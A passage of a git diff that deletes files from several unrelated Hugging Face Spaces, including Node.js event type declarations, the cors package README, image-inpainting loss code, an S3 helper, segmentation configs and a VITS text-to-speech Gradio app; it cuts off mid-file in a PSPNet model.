{ - /** This is not used in Node.js and is provided purely for completeness. */ - readonly bubbles: boolean; - /** Alias for event.stopPropagation(). This is not used in Node.js and is provided purely for completeness. */ - cancelBubble: () => void; - /** True if the event was created with the cancelable option */ - readonly cancelable: boolean; - /** This is not used in Node.js and is provided purely for completeness. */ - readonly composed: boolean; - /** Returns an array containing the current EventTarget as the only entry or empty if the event is not being dispatched. This is not used in Node.js and is provided purely for completeness. */ - composedPath(): [EventTarget?] - /** Alias for event.target. */ - readonly currentTarget: EventTarget | null; - /** Is true if cancelable is true and event.preventDefault() has been called. */ - readonly defaultPrevented: boolean; - /** This is not used in Node.js and is provided purely for completeness. */ - readonly eventPhase: 0 | 2; - /** The `AbortSignal` "abort" event is emitted with `isTrusted` set to `true`. The value is `false` in all other cases. */ - readonly isTrusted: boolean; - /** Sets the `defaultPrevented` property to `true` if `cancelable` is `true`. */ - preventDefault(): void; - /** This is not used in Node.js and is provided purely for completeness. */ - returnValue: boolean; - /** Alias for event.target. 
*/ - readonly srcElement: EventTarget | null; - /** Stops the invocation of event listeners after the current one completes. */ - stopImmediatePropagation(): void; - /** This is not used in Node.js and is provided purely for completeness. */ - stopPropagation(): void; - /** The `EventTarget` dispatching the event */ - readonly target: EventTarget | null; - /** The millisecond timestamp when the Event object was created. */ - readonly timeStamp: number; - /** Returns the type of event, e.g. "click", "hashchange", or "submit". */ - readonly type: string; -}; - -// See comment above explaining conditional type -type __EventTarget = typeof globalThis extends { onmessage: any, EventTarget: any } -? {} -: { - /** - * Adds a new handler for the `type` event. Any given `listener` is added only once per `type` and per `capture` option value. - * - * If the `once` option is true, the `listener` is removed after the next time a `type` event is dispatched. - * - * The `capture` option is not used by Node.js in any functional way other than tracking registered event listeners per the `EventTarget` specification. - * Specifically, the `capture` option is used as part of the key when registering a `listener`. - * Any individual `listener` may be added once with `capture = false`, and once with `capture = true`. - */ - addEventListener( - type: string, - listener: EventListener | EventListenerObject, - options?: AddEventListenerOptions | boolean, - ): void; - /** Dispatches a synthetic event event to target and returns true if either event's cancelable attribute value is false or its preventDefault() method was not invoked, and false otherwise. */ - dispatchEvent(event: Event): boolean; - /** Removes the event listener in target's event listener list with the same type, callback, and options. */ - removeEventListener( - type: string, - listener: EventListener | EventListenerObject, - options?: EventListenerOptions | boolean, - ): void; -}; - -interface EventInit { - bubbles?: boolean; - cancelable?: boolean; - composed?: boolean; -} - -interface EventListenerOptions { - /** Not directly used by Node.js. Added for API completeness. Default: `false`. */ - capture?: boolean; -} - -interface AddEventListenerOptions extends EventListenerOptions { - /** When `true`, the listener is automatically removed when it is first invoked. Default: `false`. */ - once?: boolean; - /** When `true`, serves as a hint that the listener will not call the `Event` object's `preventDefault()` method. Default: false. */ - passive?: boolean; -} - -interface EventListener { - (evt: Event): void; -} - -interface EventListenerObject { - handleEvent(object: Event): void; -} - -import {} from 'events'; // Make this an ambient declaration -declare global { - /** An event which takes place in the DOM. */ - interface Event extends __Event {} - var Event: typeof globalThis extends { onmessage: any, Event: infer T } - ? T - : { - prototype: __Event; - new (type: string, eventInitDict?: EventInit): __Event; - }; - - /** - * EventTarget is a DOM interface implemented by objects that can - * receive events and may have listeners for them. - */ - interface EventTarget extends __EventTarget {} - var EventTarget: typeof globalThis extends { onmessage: any, EventTarget: infer T } - ? 
T - : { - prototype: __EventTarget; - new (): __EventTarget; - }; -} diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/cors/README.md b/spaces/fffiloni/controlnet-animation-doodle/node_modules/cors/README.md deleted file mode 100644 index 732b847ed97bd13599fba587e6bbbec9df1ecdf8..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/cors/README.md +++ /dev/null @@ -1,243 +0,0 @@ -# cors - -[![NPM Version][npm-image]][npm-url] -[![NPM Downloads][downloads-image]][downloads-url] -[![Build Status][travis-image]][travis-url] -[![Test Coverage][coveralls-image]][coveralls-url] - -CORS is a node.js package for providing a [Connect](http://www.senchalabs.org/connect/)/[Express](http://expressjs.com/) middleware that can be used to enable [CORS](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing) with various options. - -**[Follow me (@troygoode) on Twitter!](https://twitter.com/intent/user?screen_name=troygoode)** - -* [Installation](#installation) -* [Usage](#usage) - * [Simple Usage](#simple-usage-enable-all-cors-requests) - * [Enable CORS for a Single Route](#enable-cors-for-a-single-route) - * [Configuring CORS](#configuring-cors) - * [Configuring CORS Asynchronously](#configuring-cors-asynchronously) - * [Enabling CORS Pre-Flight](#enabling-cors-pre-flight) -* [Configuration Options](#configuration-options) -* [Demo](#demo) -* [License](#license) -* [Author](#author) - -## Installation - -This is a [Node.js](https://nodejs.org/en/) module available through the -[npm registry](https://www.npmjs.com/). Installation is done using the -[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally): - -```sh -$ npm install cors -``` - -## Usage - -### Simple Usage (Enable *All* CORS Requests) - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -app.use(cors()) - -app.get('/products/:id', function (req, res, next) { - res.json({msg: 'This is CORS-enabled for all origins!'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -### Enable CORS for a Single Route - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -app.get('/products/:id', cors(), function (req, res, next) { - res.json({msg: 'This is CORS-enabled for a Single Route'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -### Configuring CORS - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -var corsOptions = { - origin: 'http://example.com', - optionsSuccessStatus: 200 // some legacy browsers (IE11, various SmartTVs) choke on 204 -} - -app.get('/products/:id', cors(corsOptions), function (req, res, next) { - res.json({msg: 'This is CORS-enabled for only example.com.'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -### Configuring CORS w/ Dynamic Origin - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -var whitelist = ['http://example1.com', 'http://example2.com'] -var corsOptions = { - origin: function (origin, callback) { - if (whitelist.indexOf(origin) !== -1) { - callback(null, true) - } else { - callback(new Error('Not allowed by CORS')) - } - } -} - -app.get('/products/:id', cors(corsOptions), function (req, res, next) { - res.json({msg: 'This 
is CORS-enabled for a whitelisted domain.'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -If you do not want to block REST tools or server-to-server requests, -add a `!origin` check in the origin function like so: - -```javascript -var corsOptions = { - origin: function (origin, callback) { - if (whitelist.indexOf(origin) !== -1 || !origin) { - callback(null, true) - } else { - callback(new Error('Not allowed by CORS')) - } - } -} -``` - -### Enabling CORS Pre-Flight - -Certain CORS requests are considered 'complex' and require an initial -`OPTIONS` request (called the "pre-flight request"). An example of a -'complex' CORS request is one that uses an HTTP verb other than -GET/HEAD/POST (such as DELETE) or that uses custom headers. To enable -pre-flighting, you must add a new OPTIONS handler for the route you want -to support: - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -app.options('/products/:id', cors()) // enable pre-flight request for DELETE request -app.del('/products/:id', cors(), function (req, res, next) { - res.json({msg: 'This is CORS-enabled for all origins!'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -You can also enable pre-flight across-the-board like so: - -```javascript -app.options('*', cors()) // include before other routes -``` - -### Configuring CORS Asynchronously - -```javascript -var express = require('express') -var cors = require('cors') -var app = express() - -var whitelist = ['http://example1.com', 'http://example2.com'] -var corsOptionsDelegate = function (req, callback) { - var corsOptions; - if (whitelist.indexOf(req.header('Origin')) !== -1) { - corsOptions = { origin: true } // reflect (enable) the requested origin in the CORS response - } else { - corsOptions = { origin: false } // disable CORS for this request - } - callback(null, corsOptions) // callback expects two parameters: error and options -} - -app.get('/products/:id', cors(corsOptionsDelegate), function (req, res, next) { - res.json({msg: 'This is CORS-enabled for a whitelisted domain.'}) -}) - -app.listen(80, function () { - console.log('CORS-enabled web server listening on port 80') -}) -``` - -## Configuration Options - -* `origin`: Configures the **Access-Control-Allow-Origin** CORS header. Possible values: - - `Boolean` - set `origin` to `true` to reflect the [request origin](http://tools.ietf.org/html/draft-abarth-origin-09), as defined by `req.header('Origin')`, or set it to `false` to disable CORS. - - `String` - set `origin` to a specific origin. For example if you set it to `"http://example.com"` only requests from "http://example.com" will be allowed. - - `RegExp` - set `origin` to a regular expression pattern which will be used to test the request origin. If it's a match, the request origin will be reflected. For example the pattern `/example\.com$/` will reflect any request that is coming from an origin ending with "example.com". - - `Array` - set `origin` to an array of valid origins. Each origin can be a `String` or a `RegExp`. For example `["http://example1.com", /\.example2\.com$/]` will accept any request from "http://example1.com" or from a subdomain of "example2.com". - - `Function` - set `origin` to a function implementing some custom logic. The function takes the request origin as the first parameter and a callback (which expects the signature `err [object], allow [bool]`) as the second. 
-* `methods`: Configures the **Access-Control-Allow-Methods** CORS header. Expects a comma-delimited string (ex: 'GET,PUT,POST') or an array (ex: `['GET', 'PUT', 'POST']`). -* `allowedHeaders`: Configures the **Access-Control-Allow-Headers** CORS header. Expects a comma-delimited string (ex: 'Content-Type,Authorization') or an array (ex: `['Content-Type', 'Authorization']`). If not specified, defaults to reflecting the headers specified in the request's **Access-Control-Request-Headers** header. -* `exposedHeaders`: Configures the **Access-Control-Expose-Headers** CORS header. Expects a comma-delimited string (ex: 'Content-Range,X-Content-Range') or an array (ex: `['Content-Range', 'X-Content-Range']`). If not specified, no custom headers are exposed. -* `credentials`: Configures the **Access-Control-Allow-Credentials** CORS header. Set to `true` to pass the header, otherwise it is omitted. -* `maxAge`: Configures the **Access-Control-Max-Age** CORS header. Set to an integer to pass the header, otherwise it is omitted. -* `preflightContinue`: Pass the CORS preflight response to the next handler. -* `optionsSuccessStatus`: Provides a status code to use for successful `OPTIONS` requests, since some legacy browsers (IE11, various SmartTVs) choke on `204`. - -The default configuration is the equivalent of: - -```json -{ - "origin": "*", - "methods": "GET,HEAD,PUT,PATCH,POST,DELETE", - "preflightContinue": false, - "optionsSuccessStatus": 204 -} -``` - -For details on the effect of each CORS header, read [this](http://www.html5rocks.com/en/tutorials/cors/) article on HTML5 Rocks. - -## Demo - -A demo that illustrates CORS working (and not working) using jQuery is available here: [http://node-cors-client.herokuapp.com/](http://node-cors-client.herokuapp.com/) - -Code for that demo can be found here: - -* Client: [https://github.com/TroyGoode/node-cors-client](https://github.com/TroyGoode/node-cors-client) -* Server: [https://github.com/TroyGoode/node-cors-server](https://github.com/TroyGoode/node-cors-server) - -## License - -[MIT License](http://www.opensource.org/licenses/mit-license.php) - -## Author - -[Troy Goode](https://github.com/TroyGoode) ([troygoode@gmail.com](mailto:troygoode@gmail.com)) - -[coveralls-image]: https://img.shields.io/coveralls/expressjs/cors/master.svg -[coveralls-url]: https://coveralls.io/r/expressjs/cors?branch=master -[downloads-image]: https://img.shields.io/npm/dm/cors.svg -[downloads-url]: https://npmjs.org/package/cors -[npm-image]: https://img.shields.io/npm/v/cors.svg -[npm-url]: https://npmjs.org/package/cors -[travis-image]: https://img.shields.io/travis/expressjs/cors/master.svg -[travis-url]: https://travis-ci.org/expressjs/cors diff --git a/spaces/fffiloni/lama-video-watermark-remover/saicinpainting/training/losses/perceptual.py b/spaces/fffiloni/lama-video-watermark-remover/saicinpainting/training/losses/perceptual.py deleted file mode 100644 index 8c055c2b327ce7943682af5c5f9394b9fcbec506..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/lama-video-watermark-remover/saicinpainting/training/losses/perceptual.py +++ /dev/null @@ -1,113 +0,0 @@ -import torch -import torch.nn as nn -import torch.nn.functional as F -import torchvision - -from models.ade20k import ModelBuilder -from saicinpainting.utils import check_and_warn_input_range - - -IMAGENET_MEAN = torch.FloatTensor([0.485, 0.456, 0.406])[None, :, None, None] -IMAGENET_STD = torch.FloatTensor([0.229, 0.224, 0.225])[None, :, None, None] - - -class PerceptualLoss(nn.Module): - def 
__init__(self, normalize_inputs=True): - super(PerceptualLoss, self).__init__() - - self.normalize_inputs = normalize_inputs - self.mean_ = IMAGENET_MEAN - self.std_ = IMAGENET_STD - - vgg = torchvision.models.vgg19(pretrained=True).features - vgg_avg_pooling = [] - - for weights in vgg.parameters(): - weights.requires_grad = False - - for module in vgg.modules(): - if module.__class__.__name__ == 'Sequential': - continue - elif module.__class__.__name__ == 'MaxPool2d': - vgg_avg_pooling.append(nn.AvgPool2d(kernel_size=2, stride=2, padding=0)) - else: - vgg_avg_pooling.append(module) - - self.vgg = nn.Sequential(*vgg_avg_pooling) - - def do_normalize_inputs(self, x): - return (x - self.mean_.to(x.device)) / self.std_.to(x.device) - - def partial_losses(self, input, target, mask=None): - check_and_warn_input_range(target, 0, 1, 'PerceptualLoss target in partial_losses') - - # we expect input and target to be in [0, 1] range - losses = [] - - if self.normalize_inputs: - features_input = self.do_normalize_inputs(input) - features_target = self.do_normalize_inputs(target) - else: - features_input = input - features_target = target - - for layer in self.vgg[:30]: - - features_input = layer(features_input) - features_target = layer(features_target) - - if layer.__class__.__name__ == 'ReLU': - loss = F.mse_loss(features_input, features_target, reduction='none') - - if mask is not None: - cur_mask = F.interpolate(mask, size=features_input.shape[-2:], - mode='bilinear', align_corners=False) - loss = loss * (1 - cur_mask) - - loss = loss.mean(dim=tuple(range(1, len(loss.shape)))) - losses.append(loss) - - return losses - - def forward(self, input, target, mask=None): - losses = self.partial_losses(input, target, mask=mask) - return torch.stack(losses).sum(dim=0) - - def get_global_features(self, input): - check_and_warn_input_range(input, 0, 1, 'PerceptualLoss input in get_global_features') - - if self.normalize_inputs: - features_input = self.do_normalize_inputs(input) - else: - features_input = input - - features_input = self.vgg(features_input) - return features_input - - -class ResNetPL(nn.Module): - def __init__(self, weight=1, - weights_path=None, arch_encoder='resnet50dilated', segmentation=True): - super().__init__() - self.impl = ModelBuilder.get_encoder(weights_path=weights_path, - arch_encoder=arch_encoder, - arch_decoder='ppm_deepsup', - fc_dim=2048, - segmentation=segmentation) - self.impl.eval() - for w in self.impl.parameters(): - w.requires_grad_(False) - - self.weight = weight - - def forward(self, pred, target): - pred = (pred - IMAGENET_MEAN.to(pred)) / IMAGENET_STD.to(pred) - target = (target - IMAGENET_MEAN.to(target)) / IMAGENET_STD.to(target) - - pred_feats = self.impl(pred, return_feature_maps=True) - target_feats = self.impl(target, return_feature_maps=True) - - result = torch.stack([F.mse_loss(cur_pred, cur_target) - for cur_pred, cur_target - in zip(pred_feats, target_feats)]).sum() * self.weight - return result diff --git a/spaces/flatindo/scaler/realesrgan/data/__init__.py b/spaces/flatindo/scaler/realesrgan/data/__init__.py deleted file mode 100644 index a3f8fdd1aa47c12de9687c578094303eb7369246..0000000000000000000000000000000000000000 --- a/spaces/flatindo/scaler/realesrgan/data/__init__.py +++ /dev/null @@ -1,10 +0,0 @@ -import importlib -from basicsr.utils import scandir -from os import path as osp - -# automatically scan and import dataset modules for registry -# scan all the files that end with '_dataset.py' under the data folder -data_folder = 
osp.dirname(osp.abspath(__file__)) -dataset_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(data_folder) if v.endswith('_dataset.py')] -# import all the dataset modules -_dataset_modules = [importlib.import_module(f'realesrgan.data.{file_name}') for file_name in dataset_filenames] diff --git a/spaces/flax-community/chef-transformer/utils/st.py b/spaces/flax-community/chef-transformer/utils/st.py deleted file mode 100644 index 9b27358e7e70a60d34db3264b5806973338925fc..0000000000000000000000000000000000000000 --- a/spaces/flax-community/chef-transformer/utils/st.py +++ /dev/null @@ -1,10 +0,0 @@ -import streamlit as st - - -def local_css(css_path): - with open(css_path) as f: - st.markdown(f'', unsafe_allow_html=True) - - -def remote_css(css_url): - st.markdown(f'', unsafe_allow_html=True) diff --git a/spaces/florim/MedGPT/autogpt/processing/__init__.py b/spaces/florim/MedGPT/autogpt/processing/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/freestok/corn-diseases/README.md b/spaces/freestok/corn-diseases/README.md deleted file mode 100644 index 872b989a9709a61c89f702858d8f6833bfe21889..0000000000000000000000000000000000000000 --- a/spaces/freestok/corn-diseases/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Corn Diseases -emoji: 👀 -colorFrom: green -colorTo: gray -sdk: gradio -sdk_version: 3.32.0 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/generativeai/bestpics-ms-image-similarity/services/aws_service.py b/spaces/generativeai/bestpics-ms-image-similarity/services/aws_service.py deleted file mode 100644 index ec370bd413d544b5801a6fc1e07347c7cc9d88ee..0000000000000000000000000000000000000000 --- a/spaces/generativeai/bestpics-ms-image-similarity/services/aws_service.py +++ /dev/null @@ -1,29 +0,0 @@ -import os -import boto3 -from PIL import Image -from io import BytesIO - -class AwsService: - def session(): - return boto3.Session( - aws_access_key_id = os.environ.get('AWS_ACCESS_KEY_ID'), - aws_secret_access_key = os.environ.get('AWS_SECRET_ACCESS_KEY'), - region_name=os.environ.get('AWS_REGION') - ) - - def s3_client(): - return AwsService.session().client('s3') - - def get_files_from_s3(bucket, prefix): - results = AwsService.s3_client().list_objects(Bucket=bucket, Prefix=prefix) - if 'Contents' in results: - return results['Contents'] - else: - return [] - - def get_image_from_s3(bucket, key): - file_byte_string = AwsService.s3_client().get_object(Bucket=bucket, Key=key)['Body'].read() - return { - 'key': key.split('/')[-1].split('.')[0], - 'pil': Image.open(BytesIO(file_byte_string)) - } \ No newline at end of file diff --git a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/configs/_base_/models/upernet_uniformer.py b/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/configs/_base_/models/upernet_uniformer.py deleted file mode 100644 index 41aa4db809dc6e2c508e98051f61807d07477903..0000000000000000000000000000000000000000 --- a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/configs/_base_/models/upernet_uniformer.py +++ /dev/null @@ -1,43 +0,0 @@ -# model settings -norm_cfg = dict(type='BN', requires_grad=True) -model = dict( - type='EncoderDecoder', - pretrained=None, - backbone=dict( - type='UniFormer', - embed_dim=[64, 128, 320, 512], - layers=[3, 4, 8, 3], - head_dim=64, - mlp_ratio=4., - 
qkv_bias=True, - drop_rate=0., - attn_drop_rate=0., - drop_path_rate=0.1), - decode_head=dict( - type='UPerHead', - in_channels=[64, 128, 320, 512], - in_index=[0, 1, 2, 3], - pool_scales=(1, 2, 3, 6), - channels=512, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)), - auxiliary_head=dict( - type='FCNHead', - in_channels=320, - in_index=2, - channels=256, - num_convs=1, - concat_input=False, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)), - # model training and testing settings - train_cfg=dict(), - test_cfg=dict(mode='whole')) \ No newline at end of file diff --git a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py b/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py deleted file mode 100644 index 79b5f69b654cf647dc7ae9174223781ab5c607d2..0000000000000000000000000000000000000000 --- a/spaces/georgefen/Face-Landmark-ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py +++ /dev/null @@ -1,89 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from itertools import chain - -from torch.nn.parallel import DataParallel - -from .scatter_gather import scatter_kwargs - - -class MMDataParallel(DataParallel): - """The DataParallel module that supports DataContainer. - - MMDataParallel has two main differences with PyTorch DataParallel: - - - It supports a custom type :class:`DataContainer` which allows more - flexible control of input data during both GPU and CPU inference. - - It implement two more APIs ``train_step()`` and ``val_step()``. - - Args: - module (:class:`nn.Module`): Module to be encapsulated. - device_ids (list[int]): Device IDS of modules to be scattered to. - Defaults to None when GPU is not available. - output_device (str | int): Device ID for output. Defaults to None. - dim (int): Dimension used to scatter the data. Defaults to 0. - """ - - def __init__(self, *args, dim=0, **kwargs): - super(MMDataParallel, self).__init__(*args, dim=dim, **kwargs) - self.dim = dim - - def forward(self, *inputs, **kwargs): - """Override the original forward function. - - The main difference lies in the CPU inference where the data in - :class:`DataContainers` will still be gathered. 
- """ - if not self.device_ids: - # We add the following line thus the module could gather and - # convert data containers as those in GPU inference - inputs, kwargs = self.scatter(inputs, kwargs, [-1]) - return self.module(*inputs[0], **kwargs[0]) - else: - return super().forward(*inputs, **kwargs) - - def scatter(self, inputs, kwargs, device_ids): - return scatter_kwargs(inputs, kwargs, device_ids, dim=self.dim) - - def train_step(self, *inputs, **kwargs): - if not self.device_ids: - # We add the following line thus the module could gather and - # convert data containers as those in GPU inference - inputs, kwargs = self.scatter(inputs, kwargs, [-1]) - return self.module.train_step(*inputs[0], **kwargs[0]) - - assert len(self.device_ids) == 1, \ - ('MMDataParallel only supports single GPU training, if you need to' - ' train with multiple GPUs, please use MMDistributedDataParallel' - 'instead.') - - for t in chain(self.module.parameters(), self.module.buffers()): - if t.device != self.src_device_obj: - raise RuntimeError( - 'module must have its parameters and buffers ' - f'on device {self.src_device_obj} (device_ids[0]) but ' - f'found one of them on device: {t.device}') - - inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids) - return self.module.train_step(*inputs[0], **kwargs[0]) - - def val_step(self, *inputs, **kwargs): - if not self.device_ids: - # We add the following line thus the module could gather and - # convert data containers as those in GPU inference - inputs, kwargs = self.scatter(inputs, kwargs, [-1]) - return self.module.val_step(*inputs[0], **kwargs[0]) - - assert len(self.device_ids) == 1, \ - ('MMDataParallel only supports single GPU training, if you need to' - ' train with multiple GPUs, please use MMDistributedDataParallel' - ' instead.') - - for t in chain(self.module.parameters(), self.module.buffers()): - if t.device != self.src_device_obj: - raise RuntimeError( - 'module must have its parameters and buffers ' - f'on device {self.src_device_obj} (device_ids[0]) but ' - f'found one of them on device: {t.device}') - - inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids) - return self.module.val_step(*inputs[0], **kwargs[0]) diff --git a/spaces/ggwvits/vits-uma-genshin-honkai/app.py b/spaces/ggwvits/vits-uma-genshin-honkai/app.py deleted file mode 100644 index 92ddafdcd240434f58569b0e6964ef331a971dcf..0000000000000000000000000000000000000000 --- a/spaces/ggwvits/vits-uma-genshin-honkai/app.py +++ /dev/null @@ -1,124 +0,0 @@ -import time -import gradio as gr -import utils -import commons -from models import SynthesizerTrn -from text import text_to_sequence -from torch import no_grad, LongTensor -import torch - -hps_ms = utils.get_hparams_from_file(r'./model/config.json') -device = torch.device("cuda" if torch.cuda.is_available() else "cpu") -net_g_ms = SynthesizerTrn( - len(hps_ms.symbols), - hps_ms.data.filter_length // 2 + 1, - hps_ms.train.segment_size // hps_ms.data.hop_length, - n_speakers=hps_ms.data.n_speakers, - **hps_ms.model).to(device) -_ = net_g_ms.eval() -speakers = hps_ms.speakers -model, optimizer, learning_rate, epochs = utils.load_checkpoint(r'./model/G_953000.pth', net_g_ms, None) - -def get_text(text, hps): - text_norm, clean_text = text_to_sequence(text, hps.symbols, hps.data.text_cleaners) - if hps.data.add_blank: - text_norm = commons.intersperse(text_norm, 0) - text_norm = LongTensor(text_norm) - return text_norm, clean_text - -def vits(text, language, speaker_id, noise_scale, noise_scale_w, length_scale): - start = 
time.perf_counter() - if not len(text): - return "输入文本不能为空!", None, None - text = text.replace('\n', ' ').replace('\r', '').replace(" ", "") - if len(text) > 500: - return f"输入文字过长!{len(text)}>100", None, None - if language == 0: - text = f"[ZH]{text}[ZH]" - elif language == 1: - text = f"[JA]{text}[JA]" - else: - text = f"{text}" - stn_tst, clean_text = get_text(text, hps_ms) - with no_grad(): - x_tst = stn_tst.unsqueeze(0) - x_tst_lengths = LongTensor([stn_tst.size(0)]) - speaker_id = LongTensor([speaker_id]) - audio = net_g_ms.infer(x_tst, x_tst_lengths, sid=speaker_id, noise_scale=noise_scale, noise_scale_w=noise_scale_w, - length_scale=length_scale)[0][0, 0].data.cpu().float().numpy() - - return "生成成功!", (22050, audio), f"生成耗时 {round(time.perf_counter()-start, 2)} s" - -def search_speaker(search_value): - for s in speakers: - if search_value == s: - return s - for s in speakers: - if search_value in s: - return s - -def change_lang(language): - if language == 0: - return 0.6, 0.668, 1.2 - else: - return 0.6, 0.668, 1.1 - -download_audio_js = """ -() =>{{ - let root = document.querySelector("body > gradio-app"); - if (root.shadowRoot != null) - root = root.shadowRoot; - let audio = root.querySelector("#tts-audio").querySelector("audio"); - let text = root.querySelector("#input-text").querySelector("textarea"); - if (audio == undefined) - return; - text = text.value; - if (text == undefined) - text = Math.floor(Math.random()*100000000); - audio = audio.src; - let oA = document.createElement("a"); - oA.download = text.substr(0, 20)+'.wav'; - oA.href = audio; - document.body.appendChild(oA); - oA.click(); - oA.remove(); -}} -""" - -if __name__ == '__main__': - with gr.Blocks() as app: - gr.Markdown( - "#
    VITS语音在线合成demo\n" - "
    主要有赛马娘,原神中文,原神日语,崩坏3的音色
    " - '' - '' - ) - - with gr.Tabs(): - with gr.TabItem("vits"): - with gr.Row(): - with gr.Column(): - input_text = gr.Textbox(label="Text (100 words limitation)", lines=5, value="今天晚上吃啥好呢。", elem_id=f"input-text") - lang = gr.Dropdown(label="Language", choices=["中文", "日语", "中日混合(中文用[ZH][ZH]包裹起来,日文用[JA][JA]包裹起来)"], - type="index", value="中文") - btn = gr.Button(value="Submit") - with gr.Row(): - search = gr.Textbox(label="Search Speaker", lines=1) - btn2 = gr.Button(value="Search") - sid = gr.Dropdown(label="Speaker", choices=speakers, type="index", value=speakers[228]) - with gr.Row(): - ns = gr.Slider(label="noise_scale(控制感情变化程度)", minimum=0.1, maximum=1.0, step=0.1, value=0.6, interactive=True) - nsw = gr.Slider(label="noise_scale_w(控制音素发音长度)", minimum=0.1, maximum=1.0, step=0.1, value=0.668, interactive=True) - ls = gr.Slider(label="length_scale(控制整体语速)", minimum=0.1, maximum=2.0, step=0.1, value=1.2, interactive=True) - with gr.Column(): - o1 = gr.Textbox(label="Output Message") - o2 = gr.Audio(label="Output Audio", elem_id=f"tts-audio") - o3 = gr.Textbox(label="Extra Info") - download = gr.Button("Download Audio") - btn.click(vits, inputs=[input_text, lang, sid, ns, nsw, ls], outputs=[o1, o2, o3], api_name="generate") - download.click(None, [], [], _js=download_audio_js.format()) - btn2.click(search_speaker, inputs=[search], outputs=[sid]) - lang.change(change_lang, inputs=[lang], outputs=[ns, nsw, ls]) - with gr.TabItem("可用人物一览"): - gr.Radio(label="Speaker", choices=speakers, interactive=False, type="index") - app.queue(concurrency_count=1).launch() \ No newline at end of file diff --git a/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pspnet/model.py b/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pspnet/model.py deleted file mode 100644 index 9f9997f82bd77e4e8ac44e7550daa53739f1f828..0000000000000000000000000000000000000000 --- a/spaces/ghlee94/MEDIAR/segmentation_models_pytorch/decoders/pspnet/model.py +++ /dev/null @@ -1,101 +0,0 @@ -from typing import Optional, Union - -from segmentation_models_pytorch.encoders import get_encoder -from segmentation_models_pytorch.base import ( - SegmentationModel, - SegmentationHead, - ClassificationHead, -) -from .decoder import PSPDecoder - - -class PSPNet(SegmentationModel): - """PSPNet_ is a fully convolution neural network for image semantic segmentation. Consist of - *encoder* and *Spatial Pyramid* (decoder). Spatial Pyramid build on top of encoder and does not - use "fine-features" (features of high spatial resolution). PSPNet can be used for multiclass segmentation - of high resolution images, however it is not good for detecting small objects and producing accurate, - pixel-level mask. - - Args: - encoder_name: Name of the classification model that will be used as an encoder (a.k.a backbone) - to extract features of different spatial resolution - encoder_depth: A number of stages used in encoder in range [3, 5]. Each stage generate features - two times smaller in spatial dimensions than previous one (e.g. for depth 0 we will have features - with shapes [(N, C, H, W),], for depth 1 - [(N, C, H, W), (N, C, H // 2, W // 2)] and so on). - Default is 5 - encoder_weights: One of **None** (random initialization), **"imagenet"** (pre-training on ImageNet) and - other pretrained weights (see table with available weights for each encoder_name) - psp_out_channels: A number of filters in Spatial Pyramid - psp_use_batchnorm: If **True**, BatchNorm2d layer between Conv2D and Activation layers - is used. 
If **"inplace"** InplaceABN will be used, allows to decrease memory consumption. - Available options are **True, False, "inplace"** - psp_dropout: Spatial dropout rate in [0, 1) used in Spatial Pyramid - in_channels: A number of input channels for the model, default is 3 (RGB images) - classes: A number of classes for output mask (or you can think as a number of channels of output mask) - activation: An activation function to apply after the final convolution layer. - Available options are **"sigmoid"**, **"softmax"**, **"logsoftmax"**, **"tanh"**, **"identity"**, - **callable** and **None**. - Default is **None** - upsampling: Final upsampling factor. Default is 8 to preserve input-output spatial shape identity - aux_params: Dictionary with parameters of the auxiliary output (classification head). Auxiliary output is build - on top of encoder if **aux_params** is not **None** (default). Supported params: - - classes (int): A number of classes - - pooling (str): One of "max", "avg". Default is "avg" - - dropout (float): Dropout factor in [0, 1) - - activation (str): An activation function to apply "sigmoid"/"softmax" - (could be **None** to return logits) - - Returns: - ``torch.nn.Module``: **PSPNet** - - .. _PSPNet: - https://arxiv.org/abs/1612.01105 - """ - - def __init__( - self, - encoder_name: str = "resnet34", - encoder_weights: Optional[str] = "imagenet", - encoder_depth: int = 3, - psp_out_channels: int = 512, - psp_use_batchnorm: bool = True, - psp_dropout: float = 0.2, - in_channels: int = 3, - classes: int = 1, - activation: Optional[Union[str, callable]] = None, - upsampling: int = 8, - aux_params: Optional[dict] = None, - ): - super().__init__() - - self.encoder = get_encoder( - encoder_name, - in_channels=in_channels, - depth=encoder_depth, - weights=encoder_weights, - 